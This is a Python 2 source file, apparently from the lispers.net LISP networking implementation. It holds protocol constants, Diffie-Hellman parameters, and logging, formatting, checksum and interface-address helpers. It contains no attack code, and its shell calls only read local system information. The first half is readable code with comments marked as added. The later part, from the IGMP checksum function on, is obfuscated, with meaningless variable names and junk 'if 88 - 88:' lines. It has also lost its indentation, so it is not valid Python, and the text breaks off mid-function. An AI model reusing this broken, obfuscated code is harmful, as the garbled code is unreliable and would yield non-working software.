# UDP ports used by LISP and related encapsulations.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434

#
# LISP control-message types.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9

#
# Map-Reply actions.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5

lisp_map_reply_action_string = ["no-action", "native-forward",
    "send-map-request", "drop-action", "policy-denied", "auth-failure"]

#
# Authentication algorithm IDs and digest lengths.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32

#
# LCAF (LISP Canonical Address Format) types.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16

#
# Mapping TTLs (in minutes) and protocol timers (in seconds).
#
LISP_MR_TTL = (24 * 60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_MCAST_TTL = 15
LISP_IGMP_TTL = 240

LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60
LISP_TEST_MR_INTERVAL = 60
LISP_MAP_NOTIFY_INTERVAL = 2
LISP_DDT_MAP_REQUEST_INTERVAL = 2
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15
LISP_MAP_REQUEST_RATE_LIMIT = .5
LISP_NO_MAP_REQUEST_RATE_LIMIT_TIME = 60
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1

LISP_RLOC_PROBE_TTL = 128
LISP_RLOC_PROBE_INTERVAL = 10
LISP_RLOC_PROBE_REPLY_WAIT = 15
LISP_DEFAULT_DYN_EID_TIMEOUT = 15
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180
#
# Cipher suites for LISP data-plane crypto. The _G/_P values are
# Diffie-Hellman generator and prime-modulus parameters.
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF

LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF

LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3

LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF

LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6

LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#
# lisp_record_traceback
#
# Append the most recent traceback to ./logs/lisp-traceback.log and echo it
# to stdout. Installed as sys.excepthook by lisp_set_exception().
#
def lisp_record_traceback(*args):
    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
    fd = open("./logs/lisp-traceback.log", "a")
    fd.write("---------- Exception occurred: {} ----------\n".format(ts))
    try:
        traceback.print_last(file=fd)
    except:
        fd.write("traceback.print_last(file=fd) failed")

    try:
        traceback.print_last()
    except:
        print("traceback.print_last() failed")

    fd.close()
    return
#
# lisp_set_exception
#
# Register lisp_record_traceback() as the uncaught-exception handler.
#
def lisp_set_exception():
    sys.excepthook = lisp_record_traceback
    return
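# Illustrative usage (added, not in the original source): a lispers.net
# process installs the hook early in startup so any uncaught exception is
# preserved in ./logs/lisp-traceback.log rather than lost:
#
#   lisp_set_exception()
#   # ... rest of process startup ...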
#
# Platform detection helpers. platform.dist() is the Python 2 API for
# identifying the Linux distribution.
#
def lisp_is_raspbian():
    if (platform.dist()[0] != "debian"): return (False)
    return (platform.machine() in ["armv6l", "armv7l"])

def lisp_is_ubuntu():
    return (platform.dist()[0] == "Ubuntu")

def lisp_is_fedora():
    return (platform.dist()[0] == "fedora")

def lisp_is_centos():
    return (platform.dist()[0] == "centos")

def lisp_is_debian():
    return (platform.dist()[0] == "debian")

def lisp_is_debian_kali():
    return (platform.dist()[0] == "Kali")

def lisp_is_macos():
    return (platform.uname()[0] == "Darwin")

def lisp_is_alpine():
    return (os.path.exists("/etc/alpine-release"))

def lisp_is_x86():
    machine = platform.machine()
    return (machine in ("x86", "i686", "x86_64"))

def lisp_is_linux():
    return (platform.uname()[0] == "Linux")
#
# Cloud detection: inspect the BIOS strings via dmidecode for AWS/GCP, and
# the /.dockerenv marker file for docker.
#
def lisp_on_aws():
    bios = commands.getoutput("sudo dmidecode -s bios-vendor")
    if (bios.find("command not found") != -1 and lisp_on_docker()):
        aws = bold("AWS check", False)
        lprint("{} - dmidecode not installed in docker container".format(aws))
    return (bios.lower().find("amazon") != -1)

def lisp_on_gcp():
    bios = commands.getoutput("sudo dmidecode -s bios-version")
    return (bios.lower().find("google") != -1)

def lisp_on_docker():
    return (os.path.exists("/.dockerenv"))
#
# lisp_process_logfile
#
# If the per-process logfile no longer exists (it was rotated away),
# reopen stdout on a fresh file and print the banner again.
#
def lisp_process_logfile():
    logfile = "./logs/lisp-{}.log".format(lisp_log_id)
    if (os.path.exists(logfile)): return

    sys.stdout.close()
    sys.stdout = open(logfile, "a")

    lisp_print_banner(bold("logfile rotation", False))
    return
def lisp_i_am(name):
    global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
    global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
    global lisp_hostname

    lisp_log_id = name
    if (name == "itr"): lisp_i_am_itr = True
    if (name == "etr"): lisp_i_am_etr = True
    if (name == "rtr"): lisp_i_am_rtr = True
    if (name == "mr"): lisp_i_am_mr = True
    if (name == "ms"): lisp_i_am_ms = True
    if (name == "ddt"): lisp_i_am_ddt = True
    if (name == "core"): lisp_i_am_core = True

    lisp_hostname = socket.gethostname()
    index = lisp_hostname.find(".")
    if (index != -1): lisp_hostname = lisp_hostname[0:index]
    return
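# Illustrative usage (added, not in the original source): the ETR process
# would call lisp_i_am("etr"), which selects the log id, sets the
# lisp_i_am_etr role flag, and caches the short hostname, so a host named
# "xtr1.example.com" logs as "xtr1".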
#
# lprint
#
# Log a line to the process logfile. Suppressed when debug logging is off
# unless the caller passes the "force" marker argument.
#
def lprint(*args):
    force = ("force" in args)
    if (lisp_debug_logging == False and force == False): return

    lisp_process_logfile()
    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
    ts = ts[:-3]
    print "{}: {}:".format(ts, lisp_log_id),

    for arg in args:
        if (arg == "force"): continue
        print arg,
    print ""

    try: sys.stdout.flush()
    except: pass
    return

#
# fprint
#
# Forced lprint() -- logs even when debug logging is disabled.
#
def fprint(*args):
    fargs = args + ("force",)
    lprint(*fargs)
    return

#
# dprint
#
# Data-plane lprint() -- logs only when data-plane logging is enabled.
#
def dprint(*args):
    if (lisp_data_plane_logging): lprint(*args)
    return
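# Illustrative examples (added, not in the original source):
#
#   lprint("received Map-Reply")       # logged only if debug logging is on
#   fprint("cannot open socket")       # always logged ("force" is appended)
#   dprint("decapsulated packet")      # logged only if data-plane logging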
def debug(*args):
    lisp_process_logfile()

    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
    ts = ts[:-3]

    print red(">>>", False),
    print "{}:".format(ts),
    for arg in args: print arg,
    print red("<<<\n", False)
    try: sys.stdout.flush()
    except: pass
    return

def lisp_print_caller():
    fprint(traceback.print_last())
def lisp_print_banner(string):
    global lisp_version, lisp_hostname

    if (lisp_version == ""):
        lisp_version = commands.getoutput("cat lisp-version.txt")

    hostname = bold(lisp_hostname, False)
    lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
        datetime.datetime.now(), lisp_version, hostname))
    return
def green(string, html):
    if (html): return ('<font color="green"><b>{}</b></font>'.format(string))
    return (bold("\033[92m" + string + "\033[0m", html))

def green_last_sec(string):
    return (green(string, True))

def green_last_min(string):
    return ('<font color="#58D68D"><b>{}</b></font>'.format(string))

def red(string, html):
    if (html): return ('<font color="red"><b>{}</b></font>'.format(string))
    return (bold("\033[91m" + string + "\033[0m", html))

def blue(string, html):
    if (html): return ('<font color="blue"><b>{}</b></font>'.format(string))
    return (bold("\033[94m" + string + "\033[0m", html))

def bold(string, html):
    if (html): return ("<b>{}</b>".format(string))
    return ("\033[1m" + string + "\033[0m")
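# Illustrative examples (added, not in the original source):
#
#   bold("RLOC", True)  returns '<b>RLOC</b>'
#   red("down", False)  returns "\033[1m\033[91mdown\033[0m\033[0m", i.e.
#   the ANSI bold+red rendering used for terminal logs.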
#
# convert_font
#
# Rewrite ANSI color/bold escape sequences embedded in a logged string into
# the equivalent HTML markup produced by red()/green()/blue()/bold().
#
def convert_font(string):
    fonts = [["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold]]
    end_sequence = "[0m"

    for font in fonts:
        escape = font[0]
        func = font[1]
        escape_len = len(escape)
        index = string.find(escape)
        if (index != -1): break

    while (index != -1):
        end = string[index::].find(end_sequence)
        contents = string[index + escape_len:index + end]
        string = string[:index] + func(contents, True) + \
            string[index + end + escape_len::]
        index = string.find(escape)

    #
    # A bold escape may remain nested inside a color span, so recurse.
    #
    if (string.find("[1m") != -1): string = convert_font(string)
    return (string)
def lisp_space(num):
    output = ""
    for i in range(num): output += " "
    return (output)

def lisp_button(string, url):
    button = ('<button style="background-color:transparent;border-radius:10px; ' +
        'type="button">')

    if (url == None):
        html = button + string + "</button>"
    else:
        anchor = '<a href="{}">'.format(url)
        spacer = lisp_space(2)
        html = spacer + anchor + button + string + "</button></a>" + spacer

    return (html)
def lisp_print_cour(string):
    output = '<font face="Courier New">{}</font>'.format(string)
    return (output)

def lisp_print_sans(string):
    output = '<font face="Sans-Serif">{}</font>'.format(string)
    return (output)

def lisp_span(string, hover_string):
    output = '<span title="{}">{}</span>'.format(hover_string, string)
    return (output)
def lisp_eid_help_hover(output):
    eid_help = '''Unicast EID format:
For longest match lookups:
<address> or [<iid>]<address>
For exact match lookups:
<prefix> or [<iid>]<prefix>
Multicast EID format:
For longest match lookups:
<address>-><group> or
[<iid>]<address>->[<iid>]<group>'''

    hover = lisp_span(output, eid_help)
    return (hover)

def lisp_geo_help_hover(output):
    geo_help = '''EID format:
<address> or [<iid>]<address>
'<name>' or [<iid>]'<name>'
Geo-Point format:
d-m-s-<N|S>-d-m-s-<W|E> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
d-m-s-<N|S>-d-m-s-<W|E>/<km> or
[<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''

    hover = lisp_span(output, geo_help)
    return (hover)
def space(num):
    output = ""
    for i in range(num): output += " "
    return (output)
def lisp_get_ephemeral_port():
    return (random.randrange(32768, 65535))

def lisp_get_data_nonce():
    return (random.randint(0, 0xffffff))

def lisp_get_control_nonce():
    return (random.randint(0, (2**64) - 1))
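# Note (added, not in the original source): data-plane nonces fit the
# 24-bit nonce field of the LISP data header, while control-plane nonces
# are full 64-bit values:
#
#   lisp_get_data_nonce()     # random integer in [0, 0xffffff]
#   lisp_get_control_nonce()  # random integer in [0, 2**64 - 1]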
def lisp_hex_string(integer_value):
    value = hex(integer_value)[2::]
    if (value[-1] == "L"): value = value[0:-1]
    return (value)
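# Illustrative examples (added, not in the original source):
#
#   lisp_hex_string(255)    returns "ff" (no "0x" prefix)
#   lisp_hex_string(2**64)  returns "10000000000000000"; the trailing "L"
#   that Python 2 appends to long values is stripped.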
def lisp_get_timestamp():
    return (time.time())

def lisp_set_timestamp(seconds):
    return (time.time() + seconds)
def lisp_print_elapsed(ts):
    if (ts == 0 or ts is None): return ("never")
    elapsed = time.time() - ts
    elapsed = round(elapsed, 0)
    return (str(datetime.timedelta(seconds=elapsed)))

def lisp_print_future(ts):
    if (ts == 0): return ("never")
    future = ts - time.time()
    if (future < 0): return ("expired")
    future = round(future, 0)
    return (str(datetime.timedelta(seconds=future)))
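# Illustrative examples (added, not in the original source):
#
#   lisp_print_elapsed(time.time() - 90)  returns "0:01:30"
#   lisp_print_future(time.time() + 90)   returns "0:01:30"
#   lisp_print_future(0)                  returns "never"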
def lisp_print_eid_tuple(eid, group):
    eid_str = eid.print_prefix()
    if (group.is_null()): return (eid_str)

    group_str = group.print_prefix()
    iid = group.instance_id

    if (eid.is_null() or eid.is_exact_match(group)):
        index = group_str.find("]") + 1
        return ("[{}](*, {})".format(iid, group_str[index::]))

    sg_str = eid.print_sg(group)
    return (sg_str)
def lisp_convert_6to4(addr_str):
    if (addr_str.find("::ffff:") == -1): return (addr_str)
    addr = addr_str.split(":")
    return (addr[-1])

def lisp_convert_4to6(addr_str):
    addr = lisp_address(LISP_AFI_IPV6, "", 128, 0)
    if (addr.is_ipv4_string(addr_str)): addr_str = "::ffff:" + addr_str
    addr.store_address(addr_str)
    return (addr)
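# Illustrative examples (added, not in the original source):
#
#   lisp_convert_6to4("::ffff:10.1.1.1")  returns "10.1.1.1"
#   lisp_convert_6to4("2001:db8::1")      returns "2001:db8::1" unchanged
#   lisp_convert_4to6("10.1.1.1")         returns a lisp_address holding
#                                         the IPv4-mapped "::ffff:10.1.1.1"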
def lisp_gethostbyname(string):
    ipv4 = string.split(".")
    ipv6 = string.split(":")
    mac = string.split("-")

    #
    # Already an IPv4 address literal? Return it untouched.
    #
    if (len(ipv4) == 4):
        if (ipv4[0].isdigit() and ipv4[1].isdigit() and ipv4[2].isdigit() and
            ipv4[3].isdigit()): return (string)

    #
    # Already an IPv6 address literal? Return it untouched.
    #
    if (len(ipv6) > 1):
        try:
            int(ipv6[0], 16)
            return (string)
        except:
            pass

    #
    # Check for a MAC address in xxxx-xxxx-xxxx form.
    #
    if (len(mac) == 3):
        for i in range(3):
            try: int(mac[i], 16)
            except: break

    try:
        addr = socket.gethostbyname(string)
        return (addr)
    except:
        if (lisp_is_alpine() == False): return ("")

    #
    # Alpine's gethostbyname() is unreliable; fall back to getaddrinfo().
    #
    try:
        addr = socket.getaddrinfo(string, 0)[0]
        if (addr[3] != string): return ("")
        addr = addr[4][0]
    except:
        addr = ""
    return (addr)
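# Illustrative behavior (added, not in the original source):
#
#   lisp_gethostbyname("10.0.0.1")       returns "10.0.0.1" (IPv4 literal)
#   lisp_gethostbyname("fe80::1")        returns "fe80::1" (IPv6 literal)
#   lisp_gethostbyname("bad.name.test")  returns "" when resolution fails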
def lisp_ip_checksum(data, hdrlen=20):
    if (len(data) < hdrlen):
        lprint("IPv4 packet too short, length {}".format(len(data)))
        return (data)

    packet = binascii.hexlify(data)

    #
    # Sum the header as 16-bit words.
    #
    checksum = 0
    for i in range(0, hdrlen * 2, 4):
        checksum += int(packet[i:i+4], 16)

    #
    # Fold the carries back in and take the one's complement.
    #
    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    #
    # Splice the 2-byte checksum into bytes 10-11 of the header.
    #
    checksum = struct.pack("H", checksum)
    packet = data[0:10] + checksum + data[12::]
    return (packet)
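# Note (added, not in the original source): this is the standard RFC 1071
# internet checksum. The checksum field should be zero on entry for the
# result written into bytes 10-11 to be valid.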
def lisp_icmp_checksum(data):
    if (len(data) < 36):
        lprint("ICMP packet too short, length {}".format(len(data)))
        return (data)

    icmp = binascii.hexlify(data)

    #
    # Sum the first 36 bytes as 16-bit words (ICMP header plus the embedded
    # IPv4 header and leading payload bytes of a Too-Big message).
    #
    checksum = 0
    for i in range(0, 36, 4):
        checksum += int(icmp[i:i+4], 16)

    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    #
    # Splice the checksum into bytes 2-3 of the ICMP header.
    #
    checksum = struct.pack("H", checksum)
    icmp = data[0:2] + checksum + data[4::]
    return (icmp)
def lisp_udp_checksum(source, dest, data):
    #
    # Build the IPv6 pseudo-header: source and dest addresses, UDP length,
    # and next-header value.
    #
    s = lisp_address(LISP_AFI_IPV6, source, LISP_IPV6_HOST_MASK_LEN, 0)
    d = lisp_address(LISP_AFI_IPV6, dest, LISP_IPV6_HOST_MASK_LEN, 0)
    udplen = socket.htonl(len(data))
    next_header = socket.htonl(LISP_UDP_PROTOCOL)
    pseudo_header = s.pack_address()
    pseudo_header += d.pack_address()
    pseudo_header += struct.pack("II", udplen, next_header)

    #
    # Pad with zero nibbles so an even number of 16-bit words is summed.
    #
    udp = binascii.hexlify(pseudo_header + data)
    pad = len(udp) % 4
    for i in range(0, pad): udp += "0"

    checksum = 0
    for i in range(0, len(udp), 4):
        checksum += int(udp[i:i+4], 16)

    checksum = (checksum >> 16) + (checksum & 0xffff)
    checksum += checksum >> 16
    checksum = socket.htons(~checksum & 0xffff)

    #
    # Splice the checksum into bytes 6-7 of the UDP header.
    #
    checksum = struct.pack("H", checksum)
    udp = data[0:6] + checksum + data[8::]
    return (udp)
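# Note (added, not in the original source): UDP checksums over IPv6 are
# computed across a pseudo-header (source address, destination address,
# UDP length, next-header = UDP) as RFC 2460 requires, which is why the
# pseudo-header is prepended before summing above.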
def lisp_igmp_checksum ( igmp ) :
i11ii = binascii . hexlify ( igmp )
oO0oOoo0O = 0
for iIi1I1 in range ( 0 , 24 , 4 ) :
oO0oOoo0O += int ( i11ii [ iIi1I1 : iIi1I1 + 4 ] , 16 )
oO0oOoo0O = ( oO0oOoo0O >> 16 ) + ( oO0oOoo0O & 0xffff )
oO0oOoo0O += oO0oOoo0O >> 16
oO0oOoo0O = socket . htons ( ~ oO0oOoo0O & 0xffff )
oO0oOoo0O = struct . pack ( "H" , oO0oOoo0O )
igmp = igmp [ 0 : 2 ] + oO0oOoo0O + igmp [ 4 : : ]
return ( igmp )
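#
# A self-contained sketch of the 16-bit one's-complement fold both checksum
# routines above perform (illustrative only; nothing in this module calls
# it):
#
def _ones_complement_fold_sketch(words):

    #
    # Sum the 16-bit words, fold the carries back into the low 16 bits,
    # then complement.
    #
    total = sum(words)
    total = (total >> 16) + (total & 0xffff)
    total += total >> 16
    return (~total & 0xffff)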
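#
# lisp_get_interface_address
#
# Return the first IPv4 address on the named device as a lisp_address(),
# or None when the device does not exist or has no IPv4 address.
#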
def lisp_get_interface_address ( device ) :
if ( device not in netifaces . interfaces ( ) ) : return ( None )
IIiiI = netifaces . ifaddresses ( device )
if ( IIiiI . has_key ( netifaces . AF_INET ) == False ) : return ( None )
o0oOo0OO = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
for o0o00O0oOooO0 in IIiiI [ netifaces . AF_INET ] :
oo0o00OO = o0o00O0oOooO0 [ "addr" ]
o0oOo0OO . store_address ( oo0o00OO )
return ( o0oOo0OO )
return ( None )
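#
# lisp_get_input_interface
#
# From the first 12 bytes of a received MAC header, return a 4-tuple: the
# list of local interfaces the destination (or source) MAC maps to, the
# source MAC, the destination MAC, and a flag telling if the source MAC is
# one of ours. Returns (["?"], ...) when neither MAC is local.
#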
def lisp_get_input_interface ( packet ) :
I1iI1I1ii1 = lisp_format_packet ( packet [ 0 : 12 ] ) . replace ( " " , "" )
iIIi1 = I1iI1I1ii1 [ 0 : 12 ]
o0Ooo0o0Oo = I1iI1I1ii1 [ 12 : : ]
try : oo = lisp_mymacs . has_key ( o0Ooo0o0Oo )
except : oo = False
if ( lisp_mymacs . has_key ( iIIi1 ) ) : return ( lisp_mymacs [ iIIi1 ] , o0Ooo0o0Oo , iIIi1 , oo )
if ( oo ) : return ( lisp_mymacs [ o0Ooo0o0Oo ] , o0Ooo0o0Oo , iIIi1 , oo )
return ( [ "?" ] , o0Ooo0o0Oo , iIIi1 , oo )
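#
# lisp_get_local_interfaces
#
# Build a lisp_interface() entry for every device netifaces reports.
#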
def lisp_get_local_interfaces ( ) :
for OoO0o0OOOO in netifaces . interfaces ( ) :
II1i = lisp_interface ( OoO0o0OOOO )
II1i . add_interface ( )
return
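#
# lisp_get_loopback_address
#
# Return the first address on device "lo" other than 127.0.0.1, or None.
#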
def lisp_get_loopback_address ( ) :
for o0o00O0oOooO0 in netifaces . ifaddresses ( "lo" ) [ netifaces . AF_INET ] :
if ( o0o00O0oOooO0 [ "peer" ] == "127.0.0.1" ) : continue
return ( o0o00O0oOooO0 [ "peer" ] )
return ( None )
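#
# lisp_is_mac_string
#
# Return True when the string looks like a dash-separated MAC address,
# optionally with a mask suffix, e.g. "0050-56a8-7d84" or
# "0050-56a8-7d84/48" (example values are illustrative).
#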
def lisp_is_mac_string ( mac_str ) :
i1III1iI = mac_str . split ( "/" )
if ( len ( i1III1iI ) == 2 ) : mac_str = i1III1iI [ 0 ]
return ( len ( mac_str ) == 14 and mac_str . count ( "-" ) == 2 )
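#
# lisp_get_local_macs
#
# Populate lisp_mymacs with a map from each local MAC address (colons and
# dashes stripped) to the list of devices that own it.
#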
def lisp_get_local_macs ( ) :
for OoO0o0OOOO in netifaces . interfaces ( ) :
        o0 = OoO0o0OOOO . replace ( ":" , "" )
        o0 = o0 . replace ( "-" , "" )
if ( o0 . isalnum ( ) == False ) : continue
try :
I1I1i = netifaces . ifaddresses ( OoO0o0OOOO )
except :
continue
if ( I1I1i . has_key ( netifaces . AF_LINK ) == False ) : continue
i1III1iI = I1I1i [ netifaces . AF_LINK ] [ 0 ] [ "addr" ]
i1III1iI = i1III1iI . replace ( ":" , "" )
if ( len ( i1III1iI ) < 12 ) : continue
if ( lisp_mymacs . has_key ( i1III1iI ) == False ) : lisp_mymacs [ i1III1iI ] = [ ]
lisp_mymacs [ i1III1iI ] . append ( OoO0o0OOOO )
lprint ( "Local MACs are: {}" . format ( lisp_mymacs ) )
return
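#
# lisp_get_local_rloc
#
# Find the device the default route points at (via netstat) and return the
# first IPv4 address on it, using ifconfig on macOS and "ip addr show"
# elsewhere. Returns an empty lisp_address() when nothing is found.
#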
def lisp_get_local_rloc ( ) :
II1IIiiI1 = commands . getoutput ( "netstat -rn | egrep 'default|0.0.0.0'" )
if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
II1IIiiI1 = II1IIiiI1 . split ( "\n" ) [ 0 ]
OoO0o0OOOO = II1IIiiI1 . split ( ) [ - 1 ]
o0o00O0oOooO0 = ""
O00 = lisp_is_macos ( )
if ( O00 ) :
II1IIiiI1 = commands . getoutput ( "ifconfig {} | egrep 'inet '" . format ( OoO0o0OOOO ) )
if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
else :
ooO0ooooO = 'ip addr show | egrep "inet " | egrep "{}"' . format ( OoO0o0OOOO )
II1IIiiI1 = commands . getoutput ( ooO0ooooO )
if ( II1IIiiI1 == "" ) :
ooO0ooooO = 'ip addr show | egrep "inet " | egrep "global lo"'
II1IIiiI1 = commands . getoutput ( ooO0ooooO )
if ( II1IIiiI1 == "" ) : return ( lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 ) )
o0o00O0oOooO0 = ""
II1IIiiI1 = II1IIiiI1 . split ( "\n" )
for oOOo0ooO0 in II1IIiiI1 :
oO0OO = oOOo0ooO0 . split ( ) [ 1 ]
if ( O00 == False ) : oO0OO = oO0OO . split ( "/" ) [ 0 ]
ii1i1II11II1i = lisp_address ( LISP_AFI_IPV4 , oO0OO , 32 , 0 )
return ( ii1i1II11II1i )
return ( lisp_address ( LISP_AFI_IPV4 , o0o00O0oOooO0 , 32 , 0 ) )
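#
# lisp_get_local_addresses
#
# Store the first usable IPv4 and IPv6 addresses, and the device they came
# from, in global lisp_myrlocs. The environment variable LISP_ADDR_SELECT
# can override the choice; its value is "<device>", "<address-index>", or
# "<device>:<address-index>", for example (hypothetical device name):
#
#   export LISP_ADDR_SELECT=eth0:2
#
# Returns True when an IPv4 address was found.
#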
def lisp_get_local_addresses ( ) :
global lisp_myrlocs
O0O0 = None
ooo = 1
oO0oo = os . getenv ( "LISP_ADDR_SELECT" )
if ( oO0oo != None and oO0oo != "" ) :
oO0oo = oO0oo . split ( ":" )
if ( len ( oO0oo ) == 2 ) :
O0O0 = oO0oo [ 0 ]
ooo = oO0oo [ 1 ]
else :
if ( oO0oo [ 0 ] . isdigit ( ) ) :
ooo = oO0oo [ 0 ]
else :
O0O0 = oO0oo [ 0 ]
ooo = 1 if ( ooo == "" ) else int ( ooo )
ooOOo = [ None , None , None ]
i1iii1IiiiI1i1 = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
IIIiI1i1 = lisp_address ( LISP_AFI_IPV6 , "" , 128 , 0 )
IIi11iII11i1 = None
for OoO0o0OOOO in netifaces . interfaces ( ) :
if ( O0O0 != None and O0O0 != OoO0o0OOOO ) : continue
IIiiI = netifaces . ifaddresses ( OoO0o0OOOO )
if ( IIiiI == { } ) : continue
IIi11iII11i1 = lisp_get_interface_instance_id ( OoO0o0OOOO , None )
if 88 - 88: I11i + I1IiiI - I11i / OoooooooOO - i11iIiiIii
if 24 - 24: iIii1I11I1II1
if 89 - 89: Ii1I / i1IIi - o0oOOo0O0Ooo % I1IiiI . Oo0Ooo - O0
if 71 - 71: OoO0O00 % I1IiiI - iII111i . iII111i
if ( IIiiI . has_key ( netifaces . AF_INET ) ) :
ooOo000OoO0o = IIiiI [ netifaces . AF_INET ]
I1I1 = 0
for o0o00O0oOooO0 in ooOo000OoO0o :
i1iii1IiiiI1i1 . store_address ( o0o00O0oOooO0 [ "addr" ] )
if ( i1iii1IiiiI1i1 . is_ipv4_loopback ( ) ) : continue
if ( i1iii1IiiiI1i1 . is_ipv4_link_local ( ) ) : continue
if ( i1iii1IiiiI1i1 . address == 0 ) : continue
I1I1 += 1
i1iii1IiiiI1i1 . instance_id = IIi11iII11i1
if ( O0O0 == None and
lisp_db_for_lookups . lookup_cache ( i1iii1IiiiI1i1 , False ) ) : continue
ooOOo [ 0 ] = i1iii1IiiiI1i1
if ( I1I1 == ooo ) : break
if ( IIiiI . has_key ( netifaces . AF_INET6 ) ) :
ooooo0O0 = IIiiI [ netifaces . AF_INET6 ]
I1I1 = 0
for o0o00O0oOooO0 in ooooo0O0 :
oo0o00OO = o0o00O0oOooO0 [ "addr" ]
IIIiI1i1 . store_address ( oo0o00OO )
if ( IIIiI1i1 . is_ipv6_string_link_local ( oo0o00OO ) ) : continue
if ( IIIiI1i1 . is_ipv6_loopback ( ) ) : continue
I1I1 += 1
IIIiI1i1 . instance_id = IIi11iII11i1
if ( O0O0 == None and
lisp_db_for_lookups . lookup_cache ( IIIiI1i1 , False ) ) : continue
ooOOo [ 1 ] = IIIiI1i1
if ( I1I1 == ooo ) : break
if ( ooOOo [ 0 ] == None ) : continue
